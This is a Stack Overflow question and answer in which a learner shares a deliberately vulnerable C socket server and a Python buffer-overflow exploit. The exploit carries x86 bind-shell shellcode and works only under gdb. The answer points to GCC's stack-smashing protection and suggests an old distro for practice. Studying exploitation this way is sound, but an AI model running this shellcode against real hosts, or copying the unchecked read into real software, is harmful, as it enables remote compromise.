# buffer overflow - exploit works while debuging with gdb, but

Tags: c, stack-overflow

I am trying to learn/understand buffer overflow. I thoughI already got it, but now I have problems with exploiting this (mine) vulnerable code.

When I run my exploit, when server runs in gdb, exploit works and I get remote shell(payload is correctly executed). But then I start the server outside debugger, when I start my exploit I get Floating point exception. Could anyone please explain me what I am doing wrong?

server:

```
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

void error(const char *msg) {
   perror(msg);
   exit(1);
}

void passcheck(int sockfd) {
   char buffer[1024];
   int newsockfd, n;
   struct sockaddr_in cli_addr;
   socklen_t clilen;

   for (n=0; n<1024; n++) buffer[n] = 0x31;

   clilen = sizeof(cli_addr);
   newsockfd = accept(sockfd, (struct sockaddr *) &cli_addr, &clilen);
   if (newsockfd < 0)
      error("ERROR on accept");
   n = write(newsockfd,"PASSWORD: ",10);
   if (n < 0) error("ERROR writing to socket");
   n = read(newsockfd,buffer,2024);
   if (n < 0) error("ERROR reading from socket");
   close(newsockfd);
   return;
}
int main(int argc, char *argv[]) {
   int sockfd, portno;
   struct sockaddr_in serv_addr;
   sockfd = socket(AF_INET, SOCK_STREAM, 0);
   if (sockfd < 0)
      error("ERROR opening socket");
   bzero((char *) &serv_addr, sizeof(serv_addr));
   portno = 5001;
   serv_addr.sin_family = AF_INET;
   serv_addr.sin_addr.s_addr = INADDR_ANY;
   serv_addr.sin_port = htons(portno);
   if (bind(sockfd, (struct sockaddr *) &serv_addr, sizeof(serv_addr)) < 0)
      error("ERROR on binding");
   listen(sockfd,5);
   while(1) {
     passcheck(sockfd);
     printf("Try again\n");
   }
   close(sockfd);
   return 0;
```

exploit:

```
    #!/usr/bin/python

import socket

payload =  "\x90"*(502)+"\xe8\xff\xff\xff\xff\xc3\x5d\x8d\x6d\x4a\x31\xc0\x99\x6a\x01\x5b\x52\x53\x6a\x02\xff\xd5\x96\x5b\x52\x66\x68\x2b\x67\x66\x53\x89\xe1\x6a\x10\x51\x56\xff\xd5\x43\x43\x52\x56\xff\xd5\x43\x52\x52\x56\xff\xd5\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\xeb\x04\x5f\x6a\x66\x58\x89\xe1\xcd\x80\x57\xc3\x90"+"\x04\xf3\xff\xbf"*150

s = socket.socket()
host = "127.0.0.1"
port = 5001
s.connect((host, port))
s.send(payload)
s.close
```

Answer (score 0):

When I try to run your example program (on OS X), I'm getting a segmentation fault, but I get that whether or not I run it in GDB:

```
Program received signal SIGSEGV, Segmentation fault.
0x00007fff832c2701 in __findenv () from /usr/lib/system/libsystem_c.dylib
(gdb) bt
#0  0x00007fff832c2701 in __findenv () from /usr/lib/system/libsystem_c.dylib
#1  0x00007fff832c2754 in getenv () from /usr/lib/system/libsystem_c.dylib
#2  0x00007fff83283b35 in _simple_asl_init ()
   from /usr/lib/system/libsystem_c.dylib
#3  0x00007fff8327afc0 in pthread_once ()
   from /usr/lib/system/libsystem_c.dylib
#4  0x00007fff832838f8 in _simple_asl_log_prog ()
   from /usr/lib/system/libsystem_c.dylib
#5  0x00007fff832bff8b in __stack_chk_fail ()
   from /usr/lib/system/libsystem_c.dylib
#6  0x0000000100000c86 in passcheck (sockfd=-1073745148) at foo.cpp:31
```

Notice that __stack_chk_fail seems to be part of the [stack smashing protection](http://wiki.osdev.org/GCC_Stack_Smashing_Protector) used by GCC, so your buffer overflow attempt has not gone unnoticed. I must admit I'm not entirely sure why it segfaults later on though.

Either way, I wouldn't be surprised if you're hitting something similar when you're trying this out for yourself. If you want to experiment with buffer overflows, I would recommend using an older Linux distro & gcc version, and make sure you turn off the GCC protection mechanisms. I'd recommend [Damn Small Linux](http://www.damnsmalllinux.org/), which still has a 2.4 kernel, I seem to remember 2.6 adding some buffer overflow protection mechanisms as well.

You've already learned that buffer overflows aren't as simple as they probably once used to be! :-)